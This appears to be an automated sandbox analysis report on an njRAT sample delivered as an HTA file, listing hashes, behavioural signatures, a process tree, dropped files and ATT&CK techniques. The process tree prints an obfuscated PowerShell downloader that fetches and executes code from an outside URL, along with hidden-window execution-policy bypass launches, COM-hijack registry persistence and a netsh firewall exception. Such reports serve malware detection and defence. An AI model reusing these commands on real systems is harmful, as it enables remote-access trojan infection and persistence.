Analysis

  • max time kernel
    150s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20220721-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    09-08-2022 19:13

General

  • Target

    enc3.hta

  • Size

    4KB

  • MD5

    586ddb57373ee157da834b1c83da00af

  • SHA1

    d240d7266f86bc74817fc45556d0d4cae4424efc

  • SHA256

    06769b16f5a4d86ab1c87f7811b6ed4964814cb469e01321c888dab9a2bf5696

  • SHA512

    467b362ba0feed6b6a15ce2ff767bf2e2503640f05369beba98b6dd67709a632f23b0186f7c21ecd330fd4911c19a68a6fe8e51649a7a983426fd1f2222a6b0e

Malware Config

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
      PID:1784
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@[email protected]_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 
'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"
          3⤵
            PID:3800
      • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
        POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
        1⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5068
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
            3⤵
            • Modifies registry class
            • Modifies registry key
            PID:5052
          • C:\Windows\system32\cmd.exe
            cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:860
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
            3⤵
            • Registers COM server for autorun
            • Modifies registry class
            • Modifies registry key
            PID:4528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1400
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
            3⤵
            • Modifies Windows Firewall
            PID:2976

      Network

      MITRE ATT&CK Matrix ATT&CK v6

        • Persistence
          Modify Existing Service (1) T1031
          Registry Run Keys / Startup Folder (1) T1060
        • Defense Evasion
          Modify Registry (1) T1112


      Downloads

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1
        Filesize

        604KB

        MD5

        ab1fce3ab2f6f211da8f8dc30c2b3060

        SHA1

        ae0dff660b20f9209a66029d44b048a63cc80336

        SHA256

        7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

        SHA512

        ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
        Filesize

        706B

        MD5

        1a2189e850187ca0cfadf5eba71bf87b

        SHA1

        022de59e2f7a4ada62a34c701d35a8f6b738a140

        SHA256

        d19e4c732fd1125438cb1d7e2278d9420fad7d3e66fcc6c56879258364664997

        SHA512

        9acf6053091a18388b9da45ea7147b71bbeb3acda7697d311ce9a416578595427ec3661a41c09abed75ae155d11c15b3573883effa25eeb86cfbf93eb515d49d

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1
        Filesize

        3KB

        MD5

        1fe311d146874fa10f4eedf9941dabd4

        SHA1

        4ea8f6f1fcc57a1cba5b388e11df6c3a58fc9709

        SHA256

        804d3783e70a5a575eeb0e7d617186bd1f8dcbd3244a736521194948fa80ea1d

        SHA512

        7a70c224d707ff7a723daa86ded140987fbf52d38a2c1cdacc1d04c53c447b78fa5cb49843eeebf126fa95cb72b44f436581b383ebde645ab53105d5f8fc74bb

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs
        Filesize

        1KB

        MD5

        8b0c7083e7b7bb3a886e13dcd0830ba9

        SHA1

        444748aad7b9289f1b371aaac955c0554ca62d17

        SHA256

        45bbe8aafd1246fa15881a63f3cb8997a35cfc3e78ba306fc5abbaf72cf2867e

        SHA512

        d23a9aa4d91231b26eca8c61a6487e9f151be19a45ce7a8bfb818ebd16803cfad219ae594cfb57263e7044e9f73d3705239267345f0e03a7e478f196938d3c89

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
        Filesize

        3KB

        MD5

        00e7da020005370a518c26d5deb40691

        SHA1

        389b34fdb01997f1de74a5a2be0ff656280c0432

        SHA256

        a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

        SHA512

        9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        0ab03b4ab0ee8273a1eea28cef1ca1e7

        SHA1

        8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

        SHA256

        695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

        SHA512

        7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        bc34f67b09ef76be9c393b6fb6508a35

        SHA1

        7c59c76b6afb72f268e07e1c8ec7dd7f3860ebdb

        SHA256

        8d8540e29fff09fbed6d44d34adbe5c89c005a6c7b44426dce62dcdd1bd414c6

        SHA512

        4a0ffb8c01a44edd58d92473a2b1fe169dd669d4821b7bc0617f03f1b646788a7db76f4c08b447f87a54c787d49b90560e0f97bccf88019e68300d5ddeeb387f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        50a8221b93fbd2628ac460dd408a9fc1

        SHA1

        7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

        SHA256

        46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

        SHA512

        27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

      • memory/860-142-0x0000000000000000-mapping.dmp
      • memory/1140-157-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/1140-144-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/1400-156-0x00000000053A0000-0x000000000543C000-memory.dmp
        Filesize

        624KB

      • memory/1400-158-0x00000000059F0000-0x0000000005F94000-memory.dmp
        Filesize

        5.6MB

      • memory/1400-159-0x00000000054E0000-0x0000000005572000-memory.dmp
        Filesize

        584KB

      • memory/1400-152-0x000000000040BBBE-mapping.dmp
      • memory/1400-161-0x00000000059D0000-0x00000000059DA000-memory.dmp
        Filesize

        40KB

      • memory/1400-151-0x0000000000400000-0x0000000000410000-memory.dmp
        Filesize

        64KB

      • memory/1400-162-0x0000000006240000-0x00000000062A6000-memory.dmp
        Filesize

        408KB

      • memory/2412-154-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/2412-146-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/2412-143-0x0000000000000000-mapping.dmp
      • memory/2976-160-0x0000000000000000-mapping.dmp
      • memory/3800-136-0x0000000000000000-mapping.dmp
      • memory/4036-147-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4036-133-0x0000000000000000-mapping.dmp
      • memory/4036-135-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4528-141-0x0000000000000000-mapping.dmp
      • memory/4576-130-0x000001EC78BD0000-0x000001EC78BF2000-memory.dmp
        Filesize

        136KB

      • memory/4576-150-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4576-132-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4576-131-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/5052-140-0x0000000000000000-mapping.dmp
      • memory/5068-138-0x0000000000000000-mapping.dmp